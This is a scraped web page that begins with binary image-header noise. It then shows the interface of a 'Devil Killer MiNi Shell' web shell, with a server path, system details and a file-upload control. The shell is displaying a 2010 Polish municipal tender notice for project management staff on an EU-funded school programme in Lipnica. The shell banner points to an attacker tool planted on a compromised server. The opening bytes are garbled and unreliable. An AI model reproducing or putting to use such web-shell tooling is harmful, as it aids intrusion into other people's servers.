JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100817/253968-N-2010.html

<p class="kh_header"><b>Lipnica: Wybór personelu zarządzającego projektem Dajmy im   
  Szansę  współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu 
  Społecznego.</b><br>
<b>Numer ogłoszenia: 253968 - 2010; data zamieszczenia: 17.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lipnica , ul. Słomińskiego 19, 77-130 Lipnica, woj. pomorskie, tel. 59 8217080, faks 59 8218317.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lipnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór personelu zarządzającego projektem Dajmy im   
  Szansę  współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu 
  Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór personelu zarządzającego projektem Dajmy im   
  Szansę  współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu 
  Społecznego.
  Projekt  Dajmy im szansę jest współfinansowany ze środków Europejskiego Funduszu   
  Społecznego  w  ramach Programu Operacyjnego Kapitał Ludzki Priorytetu, IX Rozwój 
   wykształcenia i kompetencji w regionach,  Działania 9.1 Wyrównywanie szans  
   edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w 
   systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o 
   utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, 
   Programu Operacyjnego Kapitał Ludzki.
   a) Dane dotyczące projektu:
        Projekt realizowany jest w Gminie Lipnica;
        Liczba placówek oświatowych objętych projektem - 3  ( w Lipnicy, Borowym Młynie i   
        Brzeźnie Szlacheckim);
        Przewidywana liczba uczniów objętych wsparciem - 280
    b) Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia.   
    c) Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawców 
         podczas wykonywania przedmiotu zamówienia.  
    d) Przedmiot zamówienia składa się z pięciu zadań częściowych:
Zadanie 1 - Pełnienie funkcji kierownika projektu Dajmy im szansę
 Zadanie 2 - Pełnienie funkcji specjalisty d/s finansowo-księgowych  projektu 
                    Dajmy im  szansę 
 Zadanie 3 - Pełnienie funkcji koordynatora szkolnego projektu Dajmy im szansę- 2 osoby
Zadanie 4 - Pełnienie funkcji specjalisty ds. monitoringu i ewaluacji  projektu
Dajmy im szansę
Zadanie 5 - Pełnienie funkcji specjalisty d/s zamówień publicznych  projektu
Dajmy im szansę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 79.42.10.00-1, 79.21.11.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca jest zobowiązany wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże i udokumentuje     
     wykonanie usług w okresie ostatnich trzech lat przed upływem terminu składania ofert a 
     jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie dla:

    a) zadanie nr 1 - wykonania co najmniej 1 usługi z zakresu administracji,
        zarządzania i kontroli przy realizacji projektu współfinansowanego ze środków
        zagranicznych,
    b) zadanie nr 2 - wykonania co najmniej 1 usługi z zakresu księgowości przy
        realizacji projektu finansowanego z funduszy zagranicznych,
    c) zadanie nr 3 - wykonania co najmniej 1 usługi z zakresu administracji,
        zarządzania i kontroli przy realizacji projektu współfinansowanego ze środków
        zagranicznych,
    d) zadanie nr 4 - wykonania co najmniej 1 usługi z zakresu monitoringu
        i ewaluacji przy realizacji projektu współfinansowanego ze środków
        zagranicznych,
   e) zadanie nr 5 - wykonania co najmniej 1 usługi z zakresu 
        i ewaluacji przy realizacji projektu współfinansowanego ze środków
        zagranicznych,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym będzie spełniony , 
          jeżeli Wykonawca   wykaże  placówki oświatowe na terenie gminy Lipnica, w których 
          będzie realizowany projekt. z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi  zostanie spełniony, jeżeli Wykonawca 
         wykaże osoby, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami  
         na temat ich kwalifikacji  zawodowych, doświadczenia i wykształcenia niezbędnych do 
         wykonania zamówienia, a  także zakres wykonywanych przez nich czynności oraz 
         informacją o podstawie do dysponowania tymi osobami. W szczególności Wykonawca  
         wykaże, że dysponuje w każdej części zadania osobami , które   posiadają następujące  
         kwalifikacje zawodowe,  wykształcenie i staż pracy:

Zadanie 1 - Pełnienie funkcji kierownika projektu Dajmy im szansę
   
1.  Wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym; stopień awansu  
     zawodowego - nauczyciel dyplomowany 
2.  Doświadczenie w zakresie wdrażania projektów współfinansowanych
     z funduszy unijnych;
3.  Doświadczenie w zakresie realizacji projektów edukacyjnych; 
4.  Pełna dyspozycyjność w trakcie trwania projektu;
 
5.  Doświadczenie w zarządzaniu publicznymi placówkami oświatowymi  poparte 4 letnim
     stażem pracy      
6.  Znajomość obsługi komputera;
7.  Posiadanie zdolności organizacyjnych
8.  Znajomość podstawowych przepisów ustawy Prawo zamówień publicznych i
     ustawy o finansach publicznych;
9. Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni z praw  
      publicznych;
10. Brak karalności za przestępstwa popełnione umyślnie lub przestępstwo skarbowe.
      o dofinansowanie,
11. Ukończone szkolenia z zakresu rozliczania i zarządzania projektami PO KL

Zadanie 2 - Pełnienie funkcji specjalisty d/s finansowo-księgowych  projektu 
                    Dajmy im szansę 
 
1.Wykształcenie wyższe ekonomiczne
2.Znajomość zasad księgowości;
3.Doświadczenie w prowadzeniu księgowości budżetowej;
4.Doświadczenie w zakresie administracji samorządowej poparte 4 letnim stażem w 
   Jednostkach samorządu terytorialnego;
5.Doświadczenie w rozliczaniu projektów finansowanych ze środków zagranicznych
6.Znajomość obsługi komputera - aplikacja MS Office,
7.Łatwość w nawiązywaniu kontaktów interpersonalnych;
8.Odpowiedzialność;
9.Komunikatywność;
10.Znajomość podstawowych przepisów ustawy o finansach publicznych, rachunkowości;
11.Znajomość klasyfikacji dochodów, wydatków budżetowych;
12.Dyspozycyjność w czasie trwania projektu
13.Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni z praw
     publicznych,
14.Brak karalności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe.

Zadanie 3 - Pełnienie funkcji koordynatora szkolnego projektu Dajmy im szansę          
                     - 2 osoby
 
1. Wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu   
    zawodowego - nauczyciel dyplomowany;
2. Doświadczenie w zakresie realizacji projektów edukacyjnych w szkołach;
3. Pełna dyspozycyjność w trakcie trwania projektu;
4. Doświadczenie w zakresie pracy w szkole szczebla podstawowego poparte
      4- letnim stażem pracy;
5. Znajomość obsługi komputera;
6. Posiadanie zdolności organizacyjnych
7. Znajomość podstawowych przepisów ustawy Prawo zamówień publicznych i
    ustawy o finansach publicznych;
8. Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni z
     praw publicznych;
9. Brak karalności za przestępstwa popełnione umyślnie lub przestępstwo skarbowe
10. Ukończone szkolenia z zakresu zarządzania  lub monitoringu i ewaluacji projektami       
      PO KL

Zadanie 4 - Pełnienie funkcji specjalisty ds. monitoringu i ewaluacji  projektu
Dajmy im szansę
 
1. Wykształcenie wyższe magisterskie;
2. Doświadczenie w zakresie realizacji projektów edukacyjnych;
3. Pełna dyspozycyjność w trakcie trwania projektu;
4. Doświadczenie w administrowaniu  publicznymi placówkami oświatowymi   poparte  
    4-letnim stażem pracy;
5. Znajomość obsługi komputera;
6. Posiadanie zdolności organizacyjnych
7. Znajomość podstawowych przepisów ustawy Prawo zamówień publicznych i
    ustawy o finansach publicznych;
8. Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni z praw
    publicznych;
9. Brak karalności za przestępstwa popełnione umyślnie lub przestępstwo skarbowe.
10. Ukończone szkolenia z zakresu  monitoringu i ewaluacji projektami       
      PO KL


Zadanie 5 - Pełnienie funkcji specjalisty ds. zamówień publicznych  projektu
                    Dajmy im szansę
 
1. Wykształcenie wyższe magisterskie;
2. Doświadczenie w zakresie realizacji projektów edukacyjnych;
3. Pełna dyspozycyjność w trakcie trwania projektu;
4. Doświadczenie w administrowaniu  publicznymi placówkami oświatowymi   poparte  
    4-letnim stażem pracy;
5. Znajomość obsługi komputera;
6. Posiadanie zdolności organizacyjnych
7. Znajomość podstawowych przepisów ustawy Prawo zamówień publicznych i
    ustawy o finansach publicznych;
8. Wykonywanie czynności związanych z przygotowaniem i przeprowadzeniem 
     postępowania o udzielenie zamówienia publicznego 
8. Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni z praw
    publicznych;
9. Brak karalności za przestępstwa popełnione umyślnie lub przestępstwo skarbowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca  posiada polisę lub inny 
   dokument ubezpieczenia potwierdzający, że wykonawca jest  ubezpieczony  od
   odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem   
    zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz  ofertowy zał. Nr 1 
      2. oświadczenie o akceptacji warunków umowy zał. Nr 8
      3. Propozycja zlecenia robót podwykonawcom zał. Nr 9
      4. pełnomocnictwo, o ile takie występuje  
     5. oświadczenie zleceniobiorcy dla celów podatkowych zał. Nr 10</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku niemożliwości wykonania zlecenia przez Wykonawcę z przyczyn nie 
    przewidzianych w chwili zawarcia umowy lub innej przyczyny losowej (np. choroba )  
    Wykonawca może za pisemną zgodą Zamawiającego powierzyć wykonanie całości lub 
    części pracy innej osobie.
Osoba, o której mowa w ust. 3  § 5 niniejszej umowy powinna spełniać wymagania 
   i  posiadać kwalifikacje takie jak Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lipnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Lipnicy
77-130 Lipnica, ul. Słomińskiego 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2010 godzina 10:00, miejsce: Urząd Gminy w Lipnicy
77-130 Lipnica, ul. Słomińskiego 19 pok. Nr 12 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  Dajmy im szansę współfinansowany ze środków Europejskiego Funduszu Społecznego realizowany  w   ramach Programu Operacyjnego Kapitał Ludzki Priorytetu, IX Rozwój wykształcenia i kompetencji w regionach,  Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wybór personelu zarządzającego projektem Dajmy im szansę                    
                   współfinansowanego przez Unię Europejską                                                    
               ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji kierownika projektu Dajmy im szansę
 
Do obowiązków  kierownika projektu należy wykonanie wszystkich czynności związanych z zarządzaniem projektu, a w szczególności: 
1. Przejęcie odpowiedzialności za całość realizacji projektu, w szczególności za
    zarządzanie przedsięwzięciem na wszystkich jego etapach zgodnie z harmonogramem,   
    budżetem i zapisami zawartymi we wniosku
2. Czuwanie nad realizacją wszystkich zadań projektu ze szczególnym uwzględnieniem ich  
     jakości, rzetelności i terminowości, nadzór nad organizacją i prawidłowym przebiegiem 
     zajęć w szkole, weryfikowanie programów nauczania pod katem merytorycznym, 
     rekrutacja uczniów
3. Podejmowanie wiążących decyzji w sprawie projektu, rozliczenie projektu,
4. Kontrola całości realizacji projektu, sprawozdawczość, odpowiedzialność za  przebieg  
    działań i ich zgodność z założeniami projektu,
5. Całościowa koordynacja merytoryczna i finansowa strony projektu,
6. Reprezentowanie Zamawiającego w sprawach związanych z realizacją projektu wobec    
     instytucji zewnętrznych 
7. Uczestnictwo w przygotowywaniu wszystkich dokumentów , wniosków
     o płatność, sprawozdań okresowych i raportów, wymaganych przez Instytucje
      Zarządzające ,
8. Utrzymywanie stałych kontaktów z koordynatorami szkolnymi  i dyrektorami szkół,  
     informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, 
     terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie 
    obowiązków i zaleceń wynikających z realizacji umowy o dofinansowanie, procedur, 
    standardów, instrukcji do sprawozdań oraz  innych obowiązujących dokumentów,
 9.  Monitorowanie na bieżąco realizacji zadań związanych z projektem zgodnie
      z harmonogramem ,budżetem i zapisami zawartymi we wniosku
10. Obecność podczas kontroli projektu.
11. Uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie z ustawą              
       Prawo zamówień publicznych, w zakresie działań projektowych.
12. Współpraca z koordynatorami szkolnymi w zakresie przygotowania szczegółowych   
       programów zajęć;
13. Nadzorowanie przebiegu zajęć;
14. Nadzór nad jakością materiałów dydaktycznych;
15. Nadzór nad opracowaniem szczegółowego harmonogramu zajęć;
16. Nadzór nad zaprojektowaniem ankiet ewaluacyjnych dla potrzeb ewaluacji;
17. Nadzór na monitoringiem i ewaluacją projektu oraz jego promocja;
18. Kontrola wydatkowania środków.

Opis dodatkowy: 
1. Wykonawca zobowiązuje się do osobistego wykonania pracy, nie może powierzyć całości   
     lub części pracy określonej w umowie  do wykonania przez  osoby trzecie beż pisemnej   
     zgody Zamawiającego. 
2. Z wykonawcą będzie podpisana umowa cywilno-prawna. 
